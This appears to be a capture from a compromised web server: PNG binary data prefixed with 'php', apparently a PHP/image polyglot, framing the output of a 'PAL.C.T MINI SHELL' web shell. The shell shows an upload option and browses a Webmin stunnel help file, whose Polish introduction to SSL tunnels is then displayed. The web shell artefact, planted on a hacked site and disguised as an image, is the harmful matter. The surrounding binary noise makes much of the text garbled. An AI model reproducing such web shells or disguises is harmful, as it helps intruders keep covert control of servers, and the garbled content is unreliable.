php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /var/www/html/sub/images/Rm19_symconf/root/usr/libexec/webmin/stunnel/help/
upload
files >> /var/www/html/sub/images/Rm19_symconf/root/usr/libexec/webmin/stunnel/help/intro.pl.auto.html

<header> Wprowadzenie do tuneli SSL </header> SSL to protokół do szyfrowania danych w połączeniu TCP podczas przesyłania przez sieć. Został pierwotnie opracowany w celu ochrony ruchu między przeglądarkami internetowymi a serwerami, ale może być używany do szyfrowania dowolnego rodzaju strumienia danych, który normalnie byłby wysyłany za pomocą protokołu TCP. <p> Protokół SSL pozwala klientom i serwerom na wzajemne uwierzytelnianie, dzięki czemu klient może mieć pewność, że naprawdę łączy się z hostem, o którym myśli. Odbywa się to za pomocą certyfikatów wydawanych przez urząd certyfikacji uznany przez klienta (w celu ich weryfikacji) i powiązany z określoną nazwą hosta. Bez certyfikatów osoba atakująca może przekierować połączenie SSL na własny serwer i przechwycić poufne informacje od klienta, który myśli, że rozmawia z prawdziwym serwerem. <p> Wszelkie dane przesyłane przez Internet w postaci niezaszyfrowanej mogą zostać przechwycone i odczytane przez atakującego z dostępem do jednej z sieci, przez które przechodzi. Nawet dane przesyłane między systemem klienta a serwerem w sieci LAN mogą łatwo nasłuchiwać. Gdy łączysz się z serwerem telnet, FTP lub POP3, twoje hasło jest wysyłane przez sieć i może zostać przechwycone przez atakującego. <p> SSL może być używany do ochrony danych w tego rodzaju sytuacjach, ale tylko wtedy, gdy obsługuje go zarówno klient, jak i serwer. Większość przeglądarek internetowych i klientów poczty może wykonywać szyfrowane SSL połączenia HTTP, POP3 i IMAP, ale nie wszystkie serwery WWW i POP3 mogą je akceptować. W szczególności POP3 jest trudny do ochrony, ponieważ standardowy serwer dostarczany z większością systemów uniksowych w ogóle nie obsługuje protokołu SSL. Na szczęście istnieje rozwiązanie - STunnel. <p> STunnel to prosty program, który przekształca nieszyfrowane połączenie w szyfrowane SSL. Zwykle jest skonfigurowany do uruchamiania z superserwera, takiego jak inetd lub xinetd, a następnie uruchamia inny program, taki jak serwer POP3, który nie obsługuje protokołu SSL. Ta konstrukcja pozwala chronić dowolny serwer, który normalnie jest uruchamiany przed inetd, taki jak serwery telnet, NNTP i IMAP. <p> Nie wszystkie serwery można jednak skutecznie chronić za pomocą szyfrowania, ponieważ nie istnieje żaden klient, który mógłby ich używać w trybie SSL. Na przykład nigdy nie słyszałem o kliencie telnet lub FTP, który może korzystać z protokołu SSL, ponieważ wspólny pakiet SSH umożliwia już szyfrowane zdalne logowanie i przesyłanie plików. <p> Ten moduł Webmina ułatwia skonfigurowanie usług superserwerów, które uruchamiają STunnel w celu uruchomienia programu serwera. Chociaż można to zrobić ręcznie za pomocą modułu usług internetowych, ten jest specjalnie zaprojektowany do konfigurowania i konfigurowania STunnel. Automatycznie wykrywa, czy masz zainstalowany program inetd i / lub xinetd, czyta ich konfiguracje, aby sprawdzić istniejące tunele SSL i dodaje je podczas tworzenia nowego tunelu. Jeśli oba są zainstalowane, nowe tunele SSL są dodawane do konfiguracji xinetd, ponieważ moim zdaniem jest on lepszy od tych dwóch. <p><hr>
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`